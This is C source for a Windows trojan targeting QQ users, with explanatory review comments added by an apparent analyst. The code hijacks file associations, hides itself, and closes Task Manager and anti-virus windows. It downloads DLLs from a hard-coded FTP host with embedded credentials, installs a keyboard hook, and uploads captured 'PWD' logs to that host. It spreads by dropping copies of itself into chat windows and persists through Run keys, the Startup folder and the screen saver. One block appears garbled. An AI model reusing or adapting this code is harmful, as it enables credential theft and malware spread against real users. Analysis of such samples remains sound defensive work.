#include <windows.h>
#include <wininet.h>
#include <stdio.h>
#include <shellapi.h>
#include <ShlObj.h>
#include <tlhelp32.h>
#include <WINERROR.H>
#include <winreg.h>
#include "resource.h"
//kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib 
#pragma comment( lib, "wininet.lib")
#pragma comment( lib, "user32.lib")
#pragma comment( lib, "advapi32.lib")
HANDLE Snapshot; // Toolhelp snapshot handle (process/module enumeration); shared by WndProc and Setup, never closed on this page
MODULEENTRY32 me = { sizeof(me) }; // module entry of this process; me.szExePath is the source path for every CopyFile in Setup()
MODULEENTRY32 qq = { sizeof(qq) }; // module entry of the located "QQ.exe"; its directory is the drop target in Setup()
WIN32_FIND_DATA fd; // scratch output for the FindFirstFile() existence checks (find handles are never closed)
BOOL IsRunDll=FALSE; // set once the "installhook" export of the companion System.dll has been called
// Path of the copy of this executable that WndProc's timer 1 pushes into a chat window via WM_DROPFILES;
// Setup() creates it. The literal is a host indicator as written.
#define PLMM "C:\\哥哥我爱你不要拒绝我.exe"
LRESULT CALLBACK WndProc(HWND hwnd,UINT msg,WPARAM wp,LPARAM); // window procedure; all timer-driven behaviour lives there
void Setup(void); // persistence/propagation routine (file drops + registry writes); defined at the end of the file
// Entry point. In order: lower-cases the command line and rewrites the HKCR txtfile/exefile open
// commands to "<windir> \SERVICES.EXE %1" (the copy Setup() later drops), forwards the original
// .txt/.log/.exe argument to Notepad / WinExec so the launch looks normal, enforces a single instance
// via the named mutex "Send", registers a window class named after the current time, fetches
// "System.dll" over FTP if it is absent and calls its "installhook" export, then creates a window that
// is never shown and pumps messages. All periodic behaviour is in WndProc (WM_TIMER).
// Every path built here as GetWindowsDirectory()+strcat(" \\...") keeps a space between the directory
// and the backslash; match indicators on that literal form. No API return value is checked.
BOOL WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrehInstance,
LPSTR lpszCmdParam,
int nCmdShow)
{
HWND hwnd;
WNDCLASS wclass;
MSG msg;
SYSTEMTIME systime; // local time, used to build the window class / window name
HKEY hKey;
DWORD type=REG_SZ; // unused
LPSTR ParamBuf,ExecBuf,p;
ParamBuf=(LPSTR)malloc(MAX_PATH); // MAX_PATH bytes, not zeroed
ExecBuf =(LPSTR)malloc(MAX_PATH);
strcpy(ParamBuf,lpszCmdParam); // NOTE(review): unbounded copy of the command line into a MAX_PATH buffer
int i=0;
while(ParamBuf[i]!='\0'){ParamBuf[i]=tolower(ParamBuf[i]);i++;} // lower-case in place so the extension tests below are case-insensitive
GetWindowsDirectory(ExecBuf,MAX_PATH); // e.g. C:\WINNT
strcat(ExecBuf," \\SERVICES.EXE %1"); // -> "C:\WINNT \SERVICES.EXE %1" (note the space); %1 = the file being opened
RegOpenKeyEx(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,"",NULL,REG_SZ,(unsigned char *)ExecBuf,MAX_PATH);// hijack the .txt open command; cbData is MAX_PATH, so the stored value also carries the uninitialised bytes after the NUL
RegCloseKey(hKey);
RegOpenKeyEx(HKEY_CLASSES_ROOT,"exefile\\shell\\open\\command",0,KEY_WRITE,&hKey);
RegSetValueEx(hKey,"",NULL,REG_SZ,(unsigned char *)ExecBuf,MAX_PATH);// hijack the .exe open command with the same value
RegCloseKey(hKey);
p=&ParamBuf[strlen(ParamBuf)-4]; // last four characters = extension; NOTE(review): points before the buffer when the argument is shorter than 4 chars
if((strcmp(".txt",p)==NULL)||(strcmp(".log",p)==NULL)) // strcmp(...)==NULL is an equality test (NULL == 0)
{
GetWindowsDirectory(ExecBuf,MAX_PATH); // e.g. C:\WINNT
strcat(ExecBuf," \\NotePad.exe ");
strcat(ExecBuf,ParamBuf);
WinExec(ExecBuf,SW_SHOW); // open the text file in Notepad so the association hijack is transparent to the user
}
if(strcmp(".exe",p)==NULL)
{
WinExec(ParamBuf,SW_SHOW); // run the .exe the user actually launched (lower-cased path)
}
GetLocalTime(&systime); // local system time
sprintf(ParamBuf,"%ld_%ld_%ld_%ld_%ld",systime.wMonth,systime.wDay,systime.wHour,systime.wMinute,systime.wSecond); // class/window name = M_D_h_m_s; WORD arguments printed with %ld
wclass.style=CS_HREDRAW | CS_VREDRAW | CS_OWNDC;
wclass.lpfnWndProc=WndProc;
wclass.cbClsExtra=0;
wclass.cbWndExtra=0;
wclass.hInstance=hInstance;
wclass.hIcon=LoadIcon(hInstance,(LPCTSTR)IDI_ICON2); // icon id from resource.h
wclass.hCursor=LoadCursor(NULL,IDC_ARROW);
wclass.lpszMenuName=NULL;
wclass.lpszClassName=ParamBuf; // time-derived class name; differs per run
wclass.hbrBackground=NULL;//HBRUSH(GetStockObject(BLACK_BRUSH));
CreateMutex(NULL,TRUE,"Send"); // single-instance guard (original: otherwise the DLL's keyboard hook would be installed more than once); the mutex name is a host indicator
if (GetLastError()==ERROR_ALREADY_EXISTS)return 0;
if(!RegisterClass(&wclass))
{
MessageBox(NULL,"Register Window Class Faile!","",48);
return 0;
}
HINTERNET Inet;
GetWindowsDirectory(ExecBuf,MAX_PATH);
strcat(ExecBuf," \\System.dll"); // -> "C:\WINNT \System.dll"
if(FindFirstFile(ExecBuf,&fd)==INVALID_HANDLE_VALUE) // companion DLL absent: fetch it over FTP (the find handle is never closed)
{
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); // WinINet session; the first argument is the agent string
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0); // FTP (service 1) connection with hard-coded host/credentials; overwrites, and so leaks, the session handle
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"System.dll",ExecBuf,0,NULL,0,0); // download to the path built above
InternetCloseHandle(Inet);
}
if(!IsRunDll) // install the keyboard hook exported by the companion DLL
{
HINSTANCE hinstDLL;
typedef void (CALLBACK *inshook)(); // signature assumed for the export; the DLL itself is not on this page
inshook instkbhook;
if(hinstDLL=LoadLibrary((LPCTSTR)"System.dll"))// loaded by bare name (normal DLL search order), not by the full path downloaded to above
{
instkbhook=(inshook)GetProcAddress(hinstDLL, "installhook"); // "installhook" export of System.dll
instkbhook(); // NOTE(review): called without checking GetProcAddress for NULL
IsRunDll=TRUE; // hook installed
}
}
hwnd=CreateWindow(ParamBuf,ParamBuf, // create the window (never shown)
WS_OVERLAPPEDWINDOW,
200,100,300,200,
NULL,NULL,
hInstance,NULL);
// ShowWindow(hwnd,SW_SHOW); // left out on purpose: the window exists only as a timer/message sink
// UpdateWindow(hwnd);
free(ExecBuf); // release buffers; both have already been consumed by RegisterClass/CreateWindow above
free(ParamBuf);
while(GetMessage(&msg,NULL,0,0)) // message loop; WndProc never posts WM_QUIT, so this loop does not end on its own
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
// Window procedure for the hidden window. WM_CREATE installs four timers, (on Win9x) hides the
// process from the task list via RegisterServiceProcess, records this module's path in `me`, and
// runs Setup(). WM_TIMER dispatches on the timer id (wp): 1 = re-run Setup() and push the PLMM file
// into the child window under the cursor via WM_DROPFILES; 2 = close Task Manager and any window
// under the cursor whose title contains a task-manager/optimizer/anti-virus/firewall keyword;
// 3 = re-fetch System.dll and (re)install the keyboard hook; 4 = upload "<windir> \system.log"
// to the FTP host and delete it. WM_CLOSE/WM_DESTROY return without DefWindowProc, so the window
// cannot be closed and no WM_QUIT is ever posted.
LRESULT CALLBACK WndProc(HWND hwnd,UINT msg,WPARAM wp,LPARAM lp)
{
switch(msg)
{
case WM_CREATE:
SetTimer(hwnd,1,60000,NULL); // timer 1: every 60 s
SetTimer(hwnd,2,100,NULL); // timer 2: every 100 ms (the original comment said 10 ms; the argument is 100)
SetTimer(hwnd,3,300000,NULL); // timer 3: every 5 min
SetTimer(hwnd,4,1200000,NULL); // timer 4: every 20 min
{
HINSTANCE hDllInst = LoadLibrary("KERNEL32.DLL"); // resolve RegisterServiceProcess dynamically (Win9x-only export)
// NOTE(review): the braces of this if-body and of the inner if below appear to have been lost in
// extraction; as printed the typedef sits directly under the if and the block does not compile.
if(hDllInst) 

  typedef DWORD (WINAPI *MYFUNC)(DWORD,DWORD);
  MYFUNC RegisterServiceProcessAlias = NULL;
  RegisterServiceProcessAlias = (MYFUNC)GetProcAddress(hDllInst, "RegisterServiceProcess");
  if(RegisterServiceProcessAlias) 

RegisterServiceProcessAlias(GetCurrentProcessId(),1); // dwType 1 = register; on Win9x this removes the process from the Ctrl+Alt+Del task list

FreeLibrary(hDllInst); 
}
// The above registers this process as a Win9x "service process", hiding it from the End Task dialog.
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL,GetCurrentProcessId()); // snapshot of this process
Module32Next(Snapshot, &me);// fill `me` (szExePath = path of this binary, the copy source in Setup()). NOTE(review): called without Module32First; the original comment notes GetModuleFileName(NULL,...) would do the same job
Setup();
}
break;
case WM_TIMER:
{
POINT lp; // NOTE(review): shadows the LPARAM parameter `lp` for the rest of this block
HWND hw,h;
char str[MAX_PATH];
HANDLE f;
SYSTEMTIME systime; // local time, used by timer 4 to name the upload
GetCursorPos(&lp);
hw=WindowFromPoint(lp); // window directly under the mouse cursor
h=hw;
while(GetParent(h)!=NULL)
h=GetParent(h); // h = top-level ancestor of hw
if(wp==1) // timer 1: re-apply persistence, then push a file into the window under the cursor
{
Setup();
HANDLE hMemData;
DROPFILES *lpDropFiles; // DROPFILES header followed by the NUL-terminated path list
char *pszStart;

h=GetDlgItem(h,0x00000); // child with control id 0 of the top-level window; original comment: the WS_EX_ACCEPTFILES child of a chat window, located with Spy++
//strcpy(str,me.szExePath); // (original, commented out) would send this binary's own path
// Below: hand the file to the chat window as a drop.
strcpy(str,PLMM); // path of the copy created by Setup() — the file that gets "dropped"
if(h==NULL)
{
return FALSE;
}
EmptyClipboard(); // NOTE(review): called before OpenClipboard(); the clipboard is not owned here yet
hMemData=GlobalAlloc(GHND,sizeof(DROPFILES)+MAX_PATH); // movable, zero-filled global block for header + path
lpDropFiles=(DROPFILES*)GlobalLock(hMemData); // lock the block and get a pointer to it
lpDropFiles->pFiles =sizeof(DROPFILES); // file list starts right after the header
lpDropFiles->fNC =FALSE; // pt is in client coordinates (pt itself is left zeroed by GHND)
lpDropFiles->fWide =FALSE; // ANSI file names
pszStart = (char*)((LPBYTE)lpDropFiles + sizeof(DROPFILES)); // start of the file list
strcpy(pszStart,str); // single path; the zero-fill supplies the double-NUL list terminator
GlobalUnlock(hMemData); // unlock hMemData
if(!OpenClipboard(hwnd)) // open the clipboard
return FALSE;
if(!EmptyClipboard()) // empty the clipboard
return FALSE;
SetClipboardData(CF_HDROP,lpDropFiles); // NOTE(review): passes the locked pointer, not the HGLOBAL (hMemData) the API expects
PostMessage(h,WM_DROPFILES,(WPARAM)(HDROP)hMemData,(LPARAM)0); // post the drop to window h. NOTE(review): hMemData is this process's private HGLOBAL; whether a window in another process reads valid data is not established here
CloseClipboard(); // close the clipboard
}
else if(wp==2) // timer 2 (100 ms): kill Task Manager and tool windows under the cursor
{
bool IsKill=false; // NOTE(review): assigned but never read
char hstr[MAX_PATH];
if(FindWindow(NULL,"Windows 任务管理器")!=NULL) // a window titled "Windows Task Manager" (Chinese UI) is open: destroy it
PostMessage(FindWindow(NULL,"Windows 任务管理器"),WM_DESTROY,0,0);
GetWindowText(h,str,MAX_PATH); // title of the top-level window under the cursor
GetWindowText(hw,hstr,MAX_PATH); // title of the window directly under the cursor
// Title-substring blocklist: 兔子 (rabbit), 任务 (task), 优化 (optimize), "Process", 进程 (process), 毒 (as in 杀毒, anti-virus),
// "***", 天网 (Skynet). Presumably aimed at task managers, system optimizers, anti-virus and firewall tools; only the literals are on this page.
if((strstr(str,"兔子") || strstr(str,"任务") || strstr(str,"优化") || strstr(str,"Process") || strstr(str,"进程") || strstr(str,"毒") || strstr(str,"***") || strstr(str,"天网") ||
strstr(hstr,"兔子")|| strstr(hstr,"任务")|| strstr(hstr,"优化")|| strstr(hstr,"Process")|| strstr(hstr,"进程")|| strstr(hstr,"毒")|| strstr(hstr,"***")|| strstr(hstr,"天网")) && hw) // hw = window under the cursor, h = its top-level ancestor
{// original: "do it a few times so nothing slips through"
PostMessage(hw,WM_DESTROY,0,0); // WM_DESTROY to the window under the cursor
PostMessage(h,WM_CLOSE,0,0); // WM_CLOSE to its top-level ancestor
PostMessage(hw,WM_CLOSE,0,0); // WM_CLOSE to the window under the cursor
PostMessage(h,WM_DESTROY,0,0); // WM_DESTROY to the top-level ancestor
IsKill=false;
}
}
else if(wp==3) // timer 3 (5 min): make sure the companion DLL is present and its hook installed
{
GetWindowsDirectory(str,MAX_PATH);
strcat(str," \\System.dll"); // -> "C:\WINNT \System.dll"
f=FindFirstFile(str,&fd); // find handle is never closed
if(f==INVALID_HANDLE_VALUE) // System.dll missing: fetch it again from the FTP host
{
HINTERNET Inet;
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); // same session/connection pattern as WinMain (session handle leaked)
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"System.dll",str,0,NULL,0,0);
InternetCloseHandle(Inet);
IsRunDll=FALSE; // force a re-hook below
}
if(!IsRunDll) // hook not installed yet: load the DLL and call its export
{
HINSTANCE hinstDLL;
typedef void (CALLBACK *inshook)(); // signature assumed for the export
inshook instkbhook;
if(hinstDLL=LoadLibrary((LPCTSTR)"System.dll")) // by bare name, not the downloaded path
{
instkbhook=(inshook)GetProcAddress(hinstDLL, "installhook"); // "installhook" export of System.dll
instkbhook(); // NOTE(review): no NULL check on the GetProcAddress result
IsRunDll=TRUE; // hook installed
}
}
}
else if(wp==4) // timer 4 (20 min): exfiltrate the log file
{
GetWindowsDirectory(str,MAX_PATH); // Windows directory
strcat(str," \\system.log"); // -> "C:\WINNT \system.log"
f=FindFirstFile(str,&fd);
if(f!=INVALID_HANDLE_VALUE) // log exists: upload it
{
HINTERNET Inet;
char newname[MAX_PATH];
GetLocalTime(&systime); // local system time
sprintf(newname,"PWD%d_%d_%d_%d.txt",systime.wMonth,systime.wDay,systime.wHour,systime.wMinute); // remote name PWD<month>_<day>_<hour>_<minute>.txt; together with the keyboard hook this looks like keystroke-capture output (the DLL is not on this page)
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0);
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0); // same FTP host/credentials as the downloads
FtpSetCurrentDirectory(Inet,"/public_html");
FtpPutFile(Inet,str,newname,INTERNET_FLAG_RESYNCHRONIZE,1); // return value ignored
if(Inet) // original comment: "if the upload succeeded, delete the log". NOTE(review): this tests the connection handle, not FtpPutFile's result
remove(str);
InternetCloseHandle(Inet);
}
}
}
break;
case WM_CLOSE:
return FALSE; // refuse to close
case WM_DESTROY:
return FALSE; // refuse to be destroyed; no PostQuitMessage anywhere
}
return DefWindowProc(hwnd,msg,wp,lp);
}
//以下是给你的机器乱来一通,怕不?怕得话就Delete 之
// Persistence and propagation. Runs from WM_CREATE and from timer 1 (every 60 s). On each run it:
//  - snapshots all processes and stops at the first image name containing "QQ", walks that process's
//    modules for "QQ.exe" and uses its directory as a drop target: a copy of this binary as
//    TIMPlatform.exe, and a QQZip.dll fetched from the FTP host in place of the existing one
//    (pre-existing files are renamed aside once, tracked by the static isrt/isrq flags);
//  - copies this binary to PLMM, "<windir> \system32\默认的幕保护程序.scr", "<windir> \services.exe"
//    and a hard-coded Administrator Startup-folder path;
//  - sets HKCU Run "System" and HKLM RunOnceEx "Services" to "%SystemRoot%\services.exe" and points
//    the HKCU screen saver at "<windir> \system32\默认的~1.SCR" with a 60 s timeout.
// No return value is checked, and neither Toolhelp snapshot handle is closed.
void Setup(void)
{
HKEY run; // registry key handle (left uninitialised if RegOpenKeyEx fails)
char dir[MAX_PATH]; // path scratch buffer
// Periodic re-application of the changes below.
{
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); // snapshot of all processes
PROCESSENTRY32 PList;
PList.dwSize=sizeof(PROCESSENTRY32); // only dwSize is initialised
while(Process32Next(Snapshot,&PList)) // NOTE(review): Process32Next without Process32First
{
if(strstr(PList.szExeFile,"QQ")) // first image name containing "QQ"
break;
}
Snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPALL,PList.th32ProcessID); // modules of that process. NOTE(review): if no match was found, th32ProcessID is whatever the last iteration left (or uninitialised)
while(Module32Next(Snapshot,&qq)!=FALSE)
{
if(strstr(qq.szExePath,"QQ.exe")) // stop at the QQ.exe module
break;
}
if((strstr(qq.szExePath,"QQ"))) // a QQ install directory is known (qq keeps its value across calls)
{
static bool isrt=false; // TIMPlatform.exe was placed by us
static bool isrq=false; // QQZip.dll was placed by us
strncpy(qq.szExePath+strlen(qq.szExePath)-6,"",1); // write one NUL six chars from the end: with a path ending in "QQ.exe" this leaves "<qqdir>\"
strcpy(dir,qq.szExePath);
strcat(dir,"TIMPlatform.exe");
if(FindFirstFile(dir,&fd)==INVALID_HANDLE_VALUE) // not present: drop a copy of this binary under that name
{
CopyFile(me.szExePath ,dir,TRUE); // copy self to <qqdir>\TIMPlatform.exe (original comment: C:\Program Files\Tencent\qq\TIMPlatform.exe)
isrt=true;
}
else if(!isrt) // present but not ours: move the existing file aside (to "<qqdir>\_") so the next pass drops the copy
{
char t[128]; // NOTE(review): szExePath may be up to MAX_PATH bytes; this copy is unbounded
strcpy(t,qq.szExePath);
strcat(t,"_");
rename(dir,t);
}
strcpy(dir,qq.szExePath);
strcat(dir,"QQZip.dll");
if(FindFirstFile(dir,&fd)==INVALID_HANDLE_VALUE) // QQZip.dll absent: fetch a replacement from the FTP host into the QQ directory
{
HINTERNET Inet;
Inet=InternetOpen("Fuck_Shaodongxinglangchao_Wangjing",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); // same session/connection pattern as WinMain (session handle leaked)
Inet=InternetConnect(Inet,"wgm001.51.net",0,"wgm001","ggfggc",1,0,0);
FtpSetCurrentDirectory(Inet,"/public_html");
FtpGetFile(Inet,"QQZip.dll",dir,0,NULL,0,0);
InternetCloseHandle(Inet);
isrq=true;
}
else if(!isrq) // the legitimate QQZip.dll is present: rename it aside so the next pass fetches the replacement
{
char t[128]; // NOTE(review): same unbounded copy as above
strcpy(t,qq.szExePath);
strcat(t,"Fuck_Shaodongxinglangchao_Wangjing.swf");
rename(dir,t);
}
}
else
strcpy(qq.szExePath,""); // no QQ found: clear so stale data is not reused
}
CopyFile(me.szExePath ,PLMM,TRUE); // copy used by timer 1 as the dropped file
GetWindowsDirectory(dir,MAX_PATH); // e.g. C:\WINNT
CopyFile(me.szExePath ,strcat(dir," \\system32\\默认的幕保护程序.scr"),TRUE);// copy posing as a screen saver: "C:\WINNT \system32\默认的幕保护程序.scr"
GetWindowsDirectory(dir,MAX_PATH); // e.g. C:\WINNT
strcat(dir," \\services.exe"); // -> "C:\WINNT \services.exe" (name chosen to resemble the system services.exe)
CopyFile(me.szExePath ,dir,TRUE); // this is the binary the HKCR open-command hijack in WinMain points at
strcpy(dir,"C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动 \\loader.exe"); // hard-coded Chinese-locale Startup folder of the Administrator account (note the space before \loader.exe)
CopyFile(me.szExePath ,dir,TRUE); // Startup-folder copy
strcpy(dir,"%SystemRoot%\\services.exe"); // value for both Run entries below
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&run);
RegSetValueEx(run,"System",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);// HKCU Run "System" (cbData is MAX_PATH, so stale bytes of dir follow the NUL)
RegCloseKey(run);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx",0,KEY_WRITE,&run);
RegSetValueEx(run,"Services",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);// HKLM RunOnceEx "Services". NOTE(review): RunOnceEx normally reads numbered subkeys, not values directly under the key — confirm whether this entry is ever processed
RegCloseKey(run);
GetWindowsDirectory(dir,MAX_PATH); // e.g. C:\WINNT
strcat(dir," \\system32\\默认的~1.SCR"); // 8.3 short name of the .scr dropped above
RegOpenKeyEx(HKEY_CURRENT_USER,"Control Panel\\Desktop",0,KEY_WRITE,&run);
RegSetValueEx(run,"ScreenSaveTimeOut",NULL,REG_SZ,(unsigned char *)"60",MAX_PATH);// 60 s timeout. NOTE(review): cbData MAX_PATH with a 3-byte literal reads past the literal
RegSetValueEx(run,"SCRNSAVE.EXE",NULL,REG_SZ,(unsigned char *)dir,MAX_PATH);// screen saver path -> the dropped copy
RegCloseKey(run);
}